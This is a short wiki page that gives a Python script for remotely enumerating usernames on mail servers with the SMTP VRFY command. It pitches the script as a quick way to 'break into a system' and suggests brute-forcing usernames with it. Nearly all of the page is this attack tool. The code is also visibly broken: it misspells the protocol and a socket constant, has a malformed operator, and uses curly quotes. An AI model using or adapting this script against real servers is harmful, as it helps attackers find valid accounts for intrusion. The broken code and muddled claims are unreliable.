Enumerate Windows Users with STMP

From TomSchaefer.org Wiki

Jump to: navigation, search

Enumerating Window Usernames remotely is always fun. If you want to break into a system fast, see if STMP is running. Most admins run STMP on their servers.

Here is a simple script that will make this task easy. 

 #!/usr/bin/python
 import socket
 import sys
 if len(sys.argv) ! = 2:
 print “usage: <username>”
 sys.exit(0)
 s = socket.socket(socket.AF_INIT, socket.SOCK_STREAM)
 connect = s.connect ((‘IPADRESS’,25))
 banner = s.recv(1024)
 print banner
 s.send (‘VRFY ‘ + sys.argv [1] + ‘\r\n’)
 result = s.recv(1024)
 print result
 s.close()


Now all you have to do is run this with a simple bash script to brute force usernames.

Retrieved from "http://www.tomschaefer.org/wiki/index.php/Enumerate_Windows_Users_with_STMP"
Personal tools